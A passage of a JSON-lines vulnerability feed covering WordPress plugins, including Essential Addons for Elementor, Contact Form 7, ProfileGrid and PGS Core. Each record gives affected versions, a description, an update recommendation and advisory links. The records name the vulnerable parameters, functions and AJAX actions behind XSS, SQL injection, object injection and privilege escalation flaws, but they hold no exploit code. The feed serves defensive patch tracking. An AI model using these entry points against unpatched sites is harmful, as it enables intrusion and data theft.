version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa70238b-530e-4c90-82f4-c3113887d0e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa70238b-530e-4c90-82f4-c3113887d0e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.21\\\/includes\\\/Classes\\\/Asset_Builder.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.21\\\/includes\\\/Classes\\\/Asset_Builder.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099937\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099937\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5188","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.22","versionEndExcluding":"5.9.23","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'get_manual_calendar_events' function in all versions up to, and including, 5.9.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a1d5fd1-80b6-4d62-9837-59ee1e020373?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a1d5fd1-80b6-4d62-9837-59ee1e020373?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097900\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097900\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4624","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.20","versionEndExcluding":"5.9.21","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eael_ext_toc_title_tag\u2019 parameter in versions up to, and including, 5.9.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedad627-0ccb-41c1-be8d-753f57be618f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedad627-0ccb-41c1-be8d-753f57be618f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.19\\\/includes\\\/Traits\\\/Elements.php#L550\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.19\\\/includes\\\/Traits\\\/Elements.php#L550\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085420\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085420\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4449","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.19","versionEndExcluding":"5.9.20","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Fancy Text', 'Filter Gallery', 'Sticky Video', 'Content Ticker', 'Woo Product Gallery', & 'Twitter Feed' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ed6c7e-ca8d-476d-adce-905b2cd2eda8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ed6c7e-ca8d-476d-adce-905b2cd2eda8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083162%40essential-addons-for-elementor-lite&new=3083162%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083162%40essential-addons-for-elementor-lite&new=3083162%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4448","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.19","versionEndExcluding":"5.9.20","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Dual Color Header', 'Event Calendar', & 'Advanced Data Table' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21e12c72-7898-4896-9852-ebb10e5f9a3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21e12c72-7898-4896-9852-ebb10e5f9a3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Dual_Color_Header.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Dual_Color_Header.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Advanced_Data_Table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Advanced_Data_Table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4275","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.19","versionEndExcluding":"5.9.20","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Interactive Circle widget in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f50b65-f001-4c73-bfe3-1aed3fc10d26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f50b65-f001-4c73-bfe3-1aed3fc10d26?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2242","slug":"contact-form-7","versionImpact":"5.9","versionEndExcluding":"5.9.2","description":"The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018active-tab\u2019 parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049594\\\/contact-form-7\\\/trunk\\\/admin\\\/edit-contact-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049594\\\/contact-form-7\\\/trunk\\\/admin\\\/edit-contact-form.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7386","slug":"wpdm-premium-packages","versionImpact":"5.9.1","versionEndExcluding":"5.9.2","description":"The Premium Packages \u2013 Sell Digital Products Securely plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.9.1. This is due to missing nonce validation on the wpdmpp_async_request() function. This makes it possible for unauthenticated attackers to perform actions such as initiating refunds via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link.","recommendation":"Update to version 5.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a714536-c6fd-495b-b774-104657329a74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a714536-c6fd-495b-b774-104657329a74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/trunk\\\/wpdm-premium-packages.php?rev=3102989#L1148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/trunk\\\/wpdm-premium-packages.php?rev=3102989#L1148\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4156","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.17","versionEndExcluding":"5.9.18","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eael_event_text_color\u2019 parameter in versions up to, and including, 5.9.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a66e6b-cec0-4110-9bef-a5d41ce1c954?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a66e6b-cec0-4110-9bef-a5d41ce1c954?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079406\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079406\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4003","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.15","versionEndExcluding":"5.9.16","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the eael_team_members_image_rounded parameter in the Team Members widget in all versions up to, and including, 5.9.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf3190c-e247-4bcc-99e0-2ab2d2fa0590?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf3190c-e247-4bcc-99e0-2ab2d2fa0590?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075644%40essential-addons-for-elementor-lite%2Ftrunk&old=3067596%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075644%40essential-addons-for-elementor-lite%2Ftrunk&old=3067596%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3728","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.15","versionEndExcluding":"5.9.16","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery & Interactive Circle widgets in all versions up to, and including, 5.9.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284ea577-ff67-4681-995b-f7bb5ef0ff3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284ea577-ff67-4681-995b-f7bb5ef0ff3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43235","slug":"meta-box","versionImpact":"5.9.10","versionEndExcluding":"5.9.11","description":"Missing Authorization vulnerability in MetaBox.Io Meta Box \u2013 WordPress Custom Fields Framework allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Meta Box \u2013 WordPress Custom Fields Framework: from n\/a through 5.9.10.","recommendation":"Update to version 5.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meta-box\\\/wordpress-meta-box-plugin-5-9-10-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meta-box\\\/wordpress-meta-box-plugin-5-9-10-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2167","slug":"event-post","versionImpact":"5.9.9","versionEndExcluding":"5.9.10","description":"The Event post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events_list' shortcodes in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257882%40event-post&new=3257882%40event-post&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257882%40event-post&new=3257882%40event-post&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bcff2d-e322-4c9c-b1c2-f07aa54faff9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bcff2d-e322-4c9c-b1c2-f07aa54faff9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1319","slug":"event-tickets-plus","versionImpact":"5.9.0","versionEndExcluding":"5.9.1","description":"The Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the attendees list on any post type regardless of status (e.g. draft, private, pending review, password-protected, and trashed posts).","recommendation":"Update to version 5.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5904dc7e-1058-4c40-bca3-66ba57b1414b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5904dc7e-1058-4c40-bca3-66ba57b1414b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12575","slug":"poll-maker","versionImpact":"5.8.9","versionEndExcluding":"5.9.0","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 5.8.9 via the 'ays_finish_poll' AJAX action. This makes it possible for unauthenticated attackers to retrieve admin email information which is exposed in the poll response.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320686\\\/poll-maker\\\/tags\\\/5.9.0\\\/public\\\/class-poll-maker-ays-public.php?old=3317469&old_path=poll-maker%2Ftags%2F5.8.9%2Fpublic%2Fclass-poll-maker-ays-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320686\\\/poll-maker\\\/tags\\\/5.9.0\\\/public\\\/class-poll-maker-ays-public.php?old=3317469&old_path=poll-maker%2Ftags%2F5.8.9%2Fpublic%2Fclass-poll-maker-ays-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3674cfb8-6372-4309-a9de-e6ef7c0b3836?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3674cfb8-6372-4309-a9de-e6ef7c0b3836?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0856","slug":"pgs-core","versionImpact":"5.8.0","versionEndExcluding":"5.9.0","description":"The PGS Core plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.8.0. This makes it possible for unauthenticated attackers to add, modify, or delete plugin options.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c33b1cb-6eb1-48cd-b706-5ec270f4ae7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c33b1cb-6eb1-48cd-b706-5ec270f4ae7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6411","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.9","versionEndExcluding":"5.9.0","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.8.9. This is due to a lack of validation on user-supplied data in the 'pm_upload_image' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their user capabilities to Administrator.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef3c7fb-27f5-4829-8cb6-d3a52778a689?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef3c7fb-27f5-4829-8cb6-d3a52778a689?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/coverimg_crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/coverimg_crop.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0855","slug":"pgs-core","versionImpact":"5.8.0","versionEndExcluding":"5.9.0","description":"The PGS Core plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.8.0 via deserialization of untrusted input in the 'import_header' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dfc2249-3761-49c6-966e-73c33be74c0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dfc2249-3761-49c6-966e-73c33be74c0e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6410","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.9","versionEndExcluding":"5.9.0","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.8.9 via the 'pm_upload_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the profile picture of any user.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8679f4cd-2cb8-48ad-a531-a00c1b85ed2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8679f4cd-2cb8-48ad-a531-a00c1b85ed2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0853","slug":"pgs-core","versionImpact":"5.8.0","versionEndExcluding":"5.9.0","description":"The PGS Core plugin for WordPress is vulnerable to SQL Injection via the 'event' parameter in the 'save_header_builder' function in all versions up to, and including, 5.8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.9.0, or a newer patched 